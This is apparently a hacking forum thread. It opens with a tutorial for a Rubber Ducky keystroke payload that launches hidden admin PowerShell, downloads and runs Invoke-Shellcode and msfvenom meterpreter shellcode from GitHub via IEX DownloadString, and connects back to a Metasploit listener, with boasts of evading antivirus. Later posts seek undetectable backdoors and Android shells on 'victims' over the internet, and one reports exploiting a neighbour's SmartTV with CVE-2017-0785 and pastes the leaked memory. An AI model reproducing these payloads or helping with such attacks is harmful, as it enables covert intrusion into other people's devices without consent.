Search the Community

Hello again friends! Today I will give a tutorial on how to create a payload that executes under 10 seconds and gives you a fully functioning meterpreter shell back to your kali linux machine. This is done under 20 lines of script. It's quite simple and works on any Windows machine with Powershell installed (Windows 7 and above comes preinstalled with this). I tested this first on my Windows 10 machine and works like a charm, fully undetected by antivirus since it writes the script to memory, not to the disk. Let's begin shall we? Step 1: Fire up Kali Linux and open a terminal. And using msfvenom we are going to create a shellcode. Enter this code: msfvenom -p windows/x64/meterpreter/reverse_https LHOST=XXX LPORT=XXX -f powershell > /root/Desktop/shellcode.txt The first part "msfvenom" indicates that we are using that specific tool. The -p parameter indicates what payload we are using. Change the "XXX" for the LHOST parameter to your Kali Linux machine, open a terminal and enter "ifconfig" if you are unsure. As for LPORT, you can use whatever you want. Typically you use 443, 8080, 4444. They all work. The -f parameter writes the shellcode in powershell format (obviously since we're using powershell). And the last part after the ">" indicates the location where this payload will be saved in. STEP 2: Now we are going to upload the shellcode to github or pastebin (whichever you prefer). Create a github account if you do not have one at https://github.com/join?source=header-home. After doing that, make a new repository on github and then upload the payload you just made (there are tutorials on google for uploading files). You can upload the file a couple different ways. The easiest is just log on github from your kali machine and upload from there. Or you can save the payload on a USB stick or somehow transfer it to your host machine and upload from there. Or if you use pastebin, upload to that! STEP 3: Now the fun part! Time to code the ducky. Copy and Paste my code and change the corresponding lines. DELAY 500 GUI x DELAY 1000 a DELAY 1000 ALT y DELAY 1000 STRING powershell -WindowStyle hidden ENTER DELAY 1000 STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1') ENTER DELAY 1000 STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/GunZofPeace/PowerSploit/master/Scripts/Meterp') ENTER DELAY 1000 STRING Invoke-Shellcode -Shellcode ($buf) -Force ENTER What is going here in we are calling the windows + x button, then typing "a", which opens the CMD with admin privileges. Which is awesome for us. It then fires up the command to start up powershell, BUT IT OPENS IT UP HIDDEN. So the actual powershell window is hidden!!!!!!! The only way to see it is running is through Task Manager. Which is good for us :) After powershell is started up, it downloads the command "Invoke-Shellcode" and injects it into memory. Which doesn't do much by itself. You want to keep this line the same as mine! Copy and paste it exactly. Only for the first IEX string. Now, the second IEX string, you want replace the last link with whatever the link is to your script is on your github account. Remember the one you uploaded? You want to click on github, the button that says "Raw" and get that link! Then replace it between the two apostrophes. Lastly, the last line of code actually executes the payload and this is where you get your shell back on your listener. Or if you used pastebin, just place that link into the code. To set up the listener, open up a terminal in Kali. >msfconsole >use exploit/multi/handler >set payload windows/x64/meterpreter/reverse_https >set LHOST XXX (whatever IP you used, which would be your kali machine IP) >set LPORT XXX (whatever port you used) >exploit And there you go! Of course, have your listener before doing the attack. If you have any questions, please comment! this is my first actual tutorial, so feedback is wanted.

Im working with Kali Linux. I started getting into working with Metasploit, Payloads ... But heres the problem: I am not finding a way to create a Payload, that does not get detected by a Antivirus. Please Help 😄

I am trying to get more proficient with Metasploit. I have encountered an issue that has made me crazy the last few days. Using ms08_067_netapi in any manner I am getting: Handler failed to bind to xx.xxx.xx.x:4444:- - [*] Started reverse TCP handler on 0.0.0.0:4444 [-] xx.xxx.xx.x:445 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (xx.xxx.xx.x:445). [*] Exploit completed, but no session was created. I have found so much about this error but not the first full clear resolution. I have done so many things but so far I have been nulled. Any ideas or suggestions? Intel Xeon 8180 Octacosa-core Intel LGA 3647 Board Running 8 15TB Utrastar Drives Windows 10 Host/w Kali

There are soo less commands for android in metasploit. It would be okay But i didnt find the command i needed the most. It was something like vnc_start . I dont remember but i used it in windows a long time ago and i got to see what the victim is doing etc. So how will i do it for android too.? Please help me out in this

Hi, I wanted to learn how to perform ATP attacks. I have a problem with creating a backdoor / payload that will not be detected by antivirus systems and which will give me access to the attacked computer via a reverse connection. I'm not a good programmer, but I thought I would create my own code that would give me a system shell using the SSH reverse tunnel. I find that if it will be my code it will not be detectable for AV. Unfortunately, the more I think about it, I come to the conclusion that once I have such a system shell, I still have to provide a meterpreter payload, which will allow for more advanced work, and it will definitely detect the anti-virus. I want to learn but I do not know what to do in such a situation. How to create a meterpreter payload that will not be detected by AV? I see that msvenom generates already encoded payload. Is it possible to get such a payload not encrypted? Maybe if I changed his sources in pure C, it would be less detectable? I've tried veil, shellter, thefatrat, etc. But it does not help. Most AV immediately detect payload. I am mainly interested in payloads on MS Windows. Later I want to try Android.

First thing first (1) Opening Terminal and typing following command:- "msfconsole" and getting this output:- so i ran that command in terminal did't worked out now after googling for 3 hrs i found many things which are here 1). i should run "bundle install" in this directory /usr/share/metasploit-framework after that i'm getting this error Now again after doing research i found that i've to update jason so ran following command "gem install json -v1.8.3" which gave me output as:- Please guys help me out here i can't open msfconsole.!😥

Hi There, I am new to the Metasploit or something related to security likes hacks. I have some question. 1) First question, how to offline update Metasploit, can i just update for the latest update (Nov 2018) or must be one by one ? Example: Must be updated from Jan'18 - Feb'18 - Mar'18 .. until Nov'18 2) OS Usage, mostly Metasploit use or launched from Kali Linux. How if i run from Windows 7, is there any mallfunction or can be caused the other target PC error ? 3) While i try to exploiting, there are many lines likes: - No Payloads were compatible with exploit bla bla bla - Exploit failed: A payload has not been selected. Am i need to make the payloads first ? (how ?) For the last, if someone have simple tutorial how to use Metasploit, very glad if you can share with me. Waiting for some responses from the forums. Thank you in advance. Best Regards, Ruben.

Hi Everyone. I am running a number of Metasploit modules for exploiting Siemens S7-300/400 and S7-1200 PLCs that were created from a Blackhat talk by Dillion Beresford in 2011. The modules are not supplied with Metasploit but have been added to the auxiliary/admin/scada/ directory. This is a link to the Modules https://github.com/moki-ics/s7-metasploit-modules The modules are showing up in Metasploit correctly and can be configured but when they are run there are a number of errors. Here is a link to a screen shot showing the errors: The module shown in the screen shot is simatic_s7_1200_command.rb I suspect the issue I am having is due to the version of Ruby being used with Metasploit is not compatible with the modules. I have run the modules in Metasploit running on Mac OSx, Metasploit on Kali running on a VM and Metasploit running on Kali on Raspberry Pi, all with same results. Greatly appreciate any help any1 can give me on this 1!

Can i run a payload(meterpreter)(metasploit) on android with rubber ducky or bash bunny over (wan)

So heres whats going on i made a shell, using reverse_tcp. And i put it on victims computer and opened it everything went smoothly in the process of opening the exe, anyways after i opened it, the shell didnt send a tcp connection back to me. Im doing this on a LAN network, both computers are right beside each other connected to ethernet. I made the exploit in a vm then uploaded it to mediafire and downloaded on other pc. But when i ran it, i didnt get a connection back it was like it was never ran. Heres all my console output currently even after opening i didnt take a screenshot but i did copy and paste. And put it on pastebin, so heres the link hopefully one of you can help me i would also like to say the the target pc had antivirus disabled. LINK: https://pastebin.com/R9G5nQGB I used port 4444 and my local ip. That link shows the whole process of setting up the payload and handler thats what all i did. Thanks to everyone who takes the time to read this i really need help.

Hey guys, my problem is that I have just installed the Kali Linux VMware Image. I changed my pass and then I did an update (apt-get update && apt-get dist-upgrade). Now I get an error when I try to initialize the Metasploit databse with „msfdb init" : root@kali:~# msfdb reinit Database already started [+] Dropping databases 'msf' [+] Dropping databases 'msf_test' [+] Dropping database user 'msf' [+] Deleting configuration file /usr/share/metasploit-framework/config/database.yml [+] Stopping database [+] Starting database [+] Creating database user 'msf' Geben Sie das Passwort der neuen Rolle ein: Geben Sie es noch einmal ein: [+] Creating databases 'msf' [+] Creating databases 'msf_test' [+] Creating configuration file '/usr/share/metasploit-framework/config/database.yml' [+] Creating initial database schema rake aborted! NoMethodError: undefined method `without' for #<Bundler::Settings:0x0000564cdb9a7b70> Did you mean? with_options /usr/share/metasploit-framework/Rakefile:18:in `rescue in <top (required)>' /usr/share/metasploit-framework/Rakefile:12:in `<top (required)>' /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/rake-12.3.0/exe/rake:27:in `<top (required)>' Caused by: LoadError: cannot load such file -- rspec/core /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/backports-3.11.1/lib/backports/std_lib.rb:9:in `require' /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/backports-3.11.1/lib/backports/std_lib.rb:9:in `require_with_backports' /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activesupport-4.2.10/lib/active_support/dependencies.rb:274:in `block in require' /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activesupport-4.2.10/lib/active_support/dependencies.rb:240:in `load_dependency' /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activesupport-4.2.10/lib/active_support/dependencies.rb:274:in `require' /usr/share/metasploit-framework/Rakefile:13:in `<top (required)>' /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/rake-12.3.0/exe/rake:27:in `<top (required)>' (See full trace by running task with --trace) Also when I start msfconsole there appears an error : root@kali:~# msfconsole /usr/share/metasploit-framework/lib/msf/core/opt.rb:55: warning: constant OpenSSL::SSL::SSLContext::METHODS is deprecated When I type db_status in msfconsole it says it is connected, but when i search for something it says that the cache is not build yet. Anyone got a solution for this ? :/ Thanks in advance

Hey there! I am Luuk a 14 year old boy who's very intrested in cyber security. When I was little [smaller] ;] I always dream about being a cool hacker. Like 1 year ago I decided to start so i made a usb with kali linux on it and i learned the basics from metasploit [meterpreter payloads] I also discovered how to hide virus for a lot of av like windows defender. I also learned the basic commands of the terminal and working with armitage. But I have 1 problem ;[ Every time when i want to start a listener i make the payload like this msfvenom -p windows/meterpreter/reverse_tcp LHOST=tcp.ngrok.io LPORT=the port of ngrok -f exe > payload.exe So thats done and i wanted to start a listener. I open metasploit and type: use multi/handler set payload windows/meterpreter/reverse_tcp set lhost 127.0.0.1 set lport 80 exploit Ok so a few month's ago it would say started reverse handler ........ And it started to listen Now it says started reverse handler and a new line is opened. What!!! What's going on When i search the job with services its listening but when i type run {job nummer} it says did you wanted a reversebindlistenadress Failed to bind 127.0.0.1 failed to bind 0.0.0.0 So thats my problem oh. Extra note: I use ngrok for meterpreter over wan {i can't port forward for some reason} It would be great if i can get a answer thanks and happy hacking!

Digging my way through metasploit using armitage on my pentest lab. I have three VMs (of 15 installed) running 1.metasploitable 2.Windows XP32 SP2 3.CentOS Nmap scan via Armitage is finding metasploitable and CentoS but not the Windows XP machine (which is kinda funny actually). However when I run Zenmap separately, it finds that machine. All VMs are in the same network. Am I missing something for metasploit to see a Windows machine? Interestingly when I review the output from the scan, there is a line that says "All 65535 scanned ports on {IP ADDRESS} are filtered...maybe I should go back to using Windows XP...

Fud backdoor with Pwnwinds with bat. format + Powershell is not connecting with metasploit listener.The backdoor was made by TheFatRat connection type :reverse https Attacked virtual box os type:windows 10

Hello everyone, I am new here - this is very first post. I hope it's in the correct section! Anyway, the past week I have been wanting to port forward in order to be able to start an external session (get into meterpreter when the victim is not using my IP) However, it turns out that port forwarding isn't possible on IPV6 - in fact, it WOULD work if the victim uses IPV6 as well. I haven't confirmed that, anyway. ( please correct me if I am wrong here) My question is, is there any way to start a session as an IPV6 user, as in maybe an exploit that can do it? I usually use the multi/handler exploit, with the windows/meterpreter/reverse_tcp payload. (also tried reverse_ipv6_tcp) If someone can help me or respond to this thread I will highly appreciate it! Thank you!

Hope someone can help me....... I used CVE-2017-0785 to exploit my neighbours SmartTV...... It gave me this out ---> sudo python CVE-2017-0785.py TARGET=CC:B1:1A:F6:D7:76 [!] Pwntools does not support 32-bit Python. Use a 64-bit release. [+] Exploit: Done 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ * 00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 01 │····│····│····│····│ 00000030 b5 69 01 00 b4 8f e9 c0 00 00 00 00 b5 54 fe a3 │·i··│····│····│·T··│ 00000040 00 00 00 06 b5 69 39 70 b4 8f e9 e0 b5 60 61 38 │····│·i9p│····│·`a8│ 00000050 b5 60 61 38 b5 69 39 70 b5 69 39 64 b5 69 5a a4 │·`a8│·i9p│·i9d│·iZ·│ 00000060 b4 8f e9 f8 00 00 00 00 b5 69 5a a4 00 00 00 41 │····│····│·iZ·│···A│ 00000070 b4 8f eb 84 b5 54 e6 f9 b5 60 61 38 b5 69 41 78 │····│·T··│·`a8│·iAx│ 00000080 b4 8f ea 08 b5 56 e0 4f b4 8f ea 10 b5 54 57 fd │····│·V·O│····│·TW·│ 00000090 00 00 00 00 b5 69 41 60 b5 56 79 59 b5 69 39 64 │····│·iA`│·VyY│·i9d│ 000000a0 b4 8f ea 30 00 00 00 18 b4 8f ea d0 b5 54 ca c3 │···0│····│····│·T··│ 000000b0 b5 69 41 60 00 00 00 05 b5 60 61 38 b4 8f ea 58 │·iA`│····│·`a8│···X│ 000000c0 00 00 00 18 b4 8f ea d0 b5 69 39 64 b5 54 d2 bf │····│····│·i9d│·T··│ 000000d0 00 00 00 00 b4 30 04 90 00 00 00 00 42 27 e0 00 │····│·0··│····│B'··│ 000000e0 00 00 00 00 b5 69 39 64 00 00 00 08 00 00 00 01 │····│·i9d│····│····│ 000000f0 b4 30 04 90 b4 8f ea d0 00 00 00 41 b5 69 39 64 │·0··│····│···A│·i9d│ 00000100 b4 8f ea a8 b5 69 41 60 00 00 00 03 b5 69 39 64 │····│·iA`│····│·i9d│ 00000110 b5 60 61 38 b4 30 c8 d8 b4 8f ea a0 b5 56 e0 4f │·`a8│·0··│····│·V·O│ 00000120 b4 8f ea a8 b5 56 f6 21 b4 30 c8 d8 41 02 6f 10 │····│·V·!│·0··│A·o·│ 00000130 b4 8f ea b8 b5 50 a1 b7 21 00 00 14 0e 0a 24 00 │····│·P··│!···│··$·│ 00000140 b5 60 61 38 b5 69 ab 60 b4 8f ea d0 b5 56 e0 4f │·`a8│·i·`│····│·V·O│ 00000150 b4 8f ea d8 b5 69 ab 58 b3 6d d4 87 00 00 00 00 │····│·i·X│·m··│····│ 00000160 b4 8f ea f8 00 00 00 02 00 00 00 10 b3 6d f4 b0 │····│····│····│·m··│ 00000170 b5 60 61 38 b5 56 d2 45 b4 8f eb 10 00 00 00 00 │·`a8│·V·E│····│····│ 00000180 b5 69 5a a4 00 00 00 41 00 00 00 13 b5 54 e6 f9 │·iZ·│···A│····│·T··│ 00000190 b4 8f ed 24 b5 69 41 60 b5 60 61 38 b4 8f eb 30 │···$│·iA`│·`a8│···0│ 000001a0 00 00 00 19 b4 8f ed 24 00 00 00 41 b5 54 9f 4b │····│···$│···A│·T·K│ 000001b0 00 00 00 00 b5 69 41 60 b5 60 61 38 00 00 00 64 │····│·iA`│·`a8│···d│ 000001c0 b4 8f eb 48 b5 56 e0 4f b4 8f eb 50 b5 56 ef 31 │···H│·V·O│···P│·V·1│ 000001d0 b5 60 61 38 b5 69 ab 60 b5 60 61 38 b5 69 ab 60 │·`a8│·i·`│·`a8│·i·`│ 000001e0 b4 8f eb 68 b5 56 e0 4f b4 8f eb 70 b5 54 57 fd │···h│·V·O│···p│·TW·│ 000001f0 b5 69 ab 58 b4 8f ed 24 00 00 00 41 b5 69 ab 10 │·i·X│···$│···A│·i··│ 00000200 b4 8f eb 90 00 00 00 0f b4 8f ed 24 b5 56 82 8b │····│····│···$│·V··│ 00000210 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000220 b5 60 61 38 b5 60 61 38 b3 6e 95 b8 00 00 00 41 │·`a8│·`a8│·n··│···A│ 00000230 b4 8f eb c8 00 00 00 41 b3 6e 95 b8 b5 60 61 38 │····│···A│·n··│·`a8│ 00000240 b3 6e b5 f0 b5 56 79 25 b5 56 78 bd b5 69 41 60 │·n··│·Vy%│·Vx·│·iA`│ 00000250 b5 69 39 64 00 00 00 14 b4 8f eb e0 b5 54 cd db │·i9d│····│····│·T··│ 00000260 b5 56 79 59 b5 69 39 64 b4 8f eb f0 b5 54 c9 f5 │·VyY│·i9d│····│·T··│ 00000270 b5 69 41 60 b5 69 41 60 00 00 00 06 b5 60 61 38 │·iA`│·iA`│····│·`a8│ 00000280 b4 8f ec 18 00 00 00 14 b3 6e f6 60 b5 54 d2 13 │····│····│·n·`│·T··│ 00000290 b5 54 da cd b5 69 41 60 00 00 00 00 b5 69 39 64 │·T··│·iA`│····│·i9d│ 000002a0 b4 8f ec 38 00 00 00 00 00 00 00 00 b5 60 00 00 │···8│····│····│·`··│ 000002b0 b5 60 61 38 b3 6f 16 a0 00 00 00 41 00 00 00 0f │·`a8│·o··│···A│····│ 000002c0 b4 8f ec 68 00 00 00 0f b3 6f 16 a8 b5 60 61 38 │···h│····│·o··│·`a8│ 000002d0 b3 6f 36 d0 b5 54 6e 5d 00 00 00 00 ff ff ff ff │·o6·│·Tn]│····│····│ 000002e0 00 00 00 00 b5 68 13 71 00 00 00 0c b5 69 39 70 │····│·h·q│····│·i9p│ 000002f0 00 00 00 0e b5 5d 62 84 b5 5d 62 c0 b5 5d 62 e0 │····│·]b·│·]b·│·]b·│ 00000300 b5 5d 63 10 b5 5d 63 3c b5 5d 63 68 00 00 00 41 │·]c·│·]c<│·]ch│···A│ 00000310 b3 6c 82 1c 00 00 00 01 00 00 00 00 b3 6c 82 36 │·l··│····│····│·l·6│ 00000320 b4 8f ed 24 00 00 00 41 b3 6c 82 36 00 00 00 00 │···$│···A│·l·6│····│ 00000330 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000340 00 00 00 00 b5 60 61 38 b5 60 61 38 b5 69 39 70 │····│·`a8│·`a8│·i9p│ 00000350 b5 69 39 64 b5 69 5a a4 b4 8f ec f0 00 00 00 00 │·i9d│·iZ·│····│····│ 00000360 b5 69 5a a4 b4 31 15 07 b5 69 39 70 b5 54 e6 f9 │·iZ·│·1··│·i9p│·T··│ 00000370 b5 69 39 64 00 00 00 02 b5 69 5a a4 b4 8f ed 20 │·i9d│····│·iZ·│··· │ 00000380 b4 31 15 07 00 00 00 0c b4 31 15 07 b5 54 ea 59 │·1··│····│·1··│·T·Y│ 00000390 00 00 00 00 00 00 00 00 00 00 00 00 41 02 6f 10 │····│····│····│A·o·│ 000003a0 b5 5d 88 94 b5 5d 88 5c b4 8f f8 f0 b5 69 f7 20 │·]··│·]·\│····│·i· │ 000003b0 00 00 02 e9 42 2b d0 10 00 00 01 74 00 00 00 00 │····│B+··│···t│····│ 000003c0 b4 8f ed 58 00 00 00 00 b4 8f ed 50 00 00 00 81 │···X│····│···P│····│ 000003d0 42 2b cc 60 b4 8f ed 60 00 00 00 00 00 00 00 00 │B+·`│···`│····│····│ 000003e0 00 00 00 00 b5 69 f7 20 b5 69 f6 d4 00 00 00 00 │····│·i· │·i··│····│ 000003f0 b4 8f ed 78 b5 69 f6 b0 00 00 00 00 00 00 ff ff │···x│·i··│····│····│ 00000400 b4 8f ed 98 b4 8f ed 90 b4 8f f8 f0 0e 0a 24 00 │····│····│····│··$·│ 00000410 b4 8f ed 98 │····││ 00000414 Who knows what to do now with this Code?

Hello I have a problem. I don't know how to set up a database for metasploit msf > db_status postgresql selected, no connection /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/shell.rb:210:in `initialize': Permission denied @ rb_sysopen - /Users/jiminsha/.msf4/history (Errno::EACCES) from /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/shell.rb:210:in `open' from /opt/metasploit-framework/embedded/framework/lib/rex/ui/text/shell.rb:210:in `run' from /opt/metasploit-framework/embedded/framework/lib/metasploit/framework/command/console.rb:48:in `start' from /opt/metasploit-framework/embedded/framework/lib/metasploit/framework/command/base.rb:82:in `start' from /opt/metasploit-framework/bin/../embedded/framework/msfconsole:48:in `<main>' I am on mac... that is why I can't find any tutorial please help.

Hi guys, Anyone know how I can get shell access in using any modern browsers (Chrome, IE, Firefox, etc. so that the browser doesn't bitch at me and say I need to upgrade to latest browser version) by browsing to a URL? I tried putting a malicious iframe on my evil portal and using these exploits: auxiliary/server/browser_autopwn, auxiliary/server/browser_autopwn2. I even tried downgrading to IE 8 then using the exploit: exploit/windows/browser/ms10_002_aurora. But so far I got nothing. :( No meterpreter sessions. This is for a presentation, by the way. Any of you guys suggest a different way? I am desperate. Wait not really. Just really frustrated. Hope someone can help. Thanks in advance!

bro i made a payload in metasploit by using ngrok without portforwarding so that i can go WAN...but in ngrok the port get changed everytime i open it...so ineed to make the payload again and again and send it to the victim...is there any way i can overcome this

Hi Guys, I can't figure out what I am doing wrong or if there is something wrong with my Metasploit setup v4.16.7 I have created a basic reverse_tcp payload with msfvenom, when I start my listener I do the following msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.0.8 LHOST => 192.168.0.8 msf exploit(handler) > set LPORT 4444 LPORT => 4444 msf exploit(handler) > exploit [*] Exploit running as background job 0. [*] Started reverse TCP handler on 192.168.0.8:4444 msf exploit(handler) > [*] Sending stage (179267 bytes) to 192.168.0.7 [*] Meterpreter session 1 opened (192.168.0.8:4444 -> 192.168.0.7:50298) at 2017-10-25 16:05:13 -0400 I am expecting to see a meterpreter but nothing... What's weird is I have watched a few tutorials and after typing exploit the console "waits" for the payload to be executed, once that happens the interpreter appears, but after I type exploit the console does not wait, I got straight back to msf exploit(handler) > Any help much appreciated.

I just create sample for android backdoor it's call apkgue.apk, after I run on my phone (android) I stuck to the next step.. the meterpreter > doesn't show.. why? any help for me? thanks.. msf > ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=3344 R > apkgue.apk [*] exec: ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=3344 R > apkgue.apk No platform was selected, choosing Msf::Module::Platform::Android from the payload No Arch selected, selecting Arch: dalvik from the payload No encoder or badchars specified, outputting raw payload Payload size: 8809 bytes msf > use exploit/multi/handler msf exploit(handler) > set payload android/meterpreter/reverse_tcp payload => android/meterpreter/reverse_tcp msf exploit(handler) > set lhost 192.168.43.128 lhost => 192.168.43.128 msf exploit(handler) > set lport 3344 lport => 3344 msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (android/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.43.128 yes The listen address LPORT 3344 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > exploit [*] Exploit running as background job 0. [*] Started reverse TCP handler on 192.168.43.128:3344 msf exploit(handler) > [*] Sending stage (69089 bytes) to 192.168.43.1 [*] Meterpreter session 1 opened (192.168.43.128:3344 -> 192.168.43.1:44411) at 2017-10-19 23:02:02 +0700

Hey just wondering if anyone can offer some advice. I am new to hacking and am loving it so far. I have started doing a hacking course I found online. But I have run into a wall. Whenever I go to run an exploit I always get the error code multi handler failure to bind or bad config. I have searched and there are a million different opinions. And I have tried changing the ports apache2 listens on. I have reinstalled kali multiple time. I have tried it on vm and and as my os. I have changed the settings in my vm from nat to nat network and even bridged. And I have run out of ideas ? Any advice would be greatly appreciated.

hi! I'm trying to get into a Windows 10 64x computer in the same LAN than another 86x pc with Kali Linux. Once I finally get into the target pc (w10) and the meterpreter session is open, the meterpreter session command prompt doesn't appear, I mean, I don't get the meterpreter> command prompt... What I'm doing wrong? Thaks!!

Hey, i'm reading a book Metasploit The Penetration Testers Guide and in it the author mentions that in general you should not set the THREADS value in Metasploit to more than 16 on Windows machines and more than 128 on UNIX style machines. I'm just curious as to why, and also why so little on windows? Later in the book the author also uses 255 threads for a port scan. Thanks

Hello, everyone I have successfully used metasploit to hack android on LAN using my own android Hotspot connection. Now, I want to know how to use metasploit over WAN using the same. I can only connect my Kali Machine to my android Hotspot connection for Internet connectivity. I have searched over net there are solutions like SSH tunneling and port forward from your android. Some are saying that your ISP must have blocked the LPORT that you have used. Some are suggesting using VPN. I am really confused what to do can anyone help me out.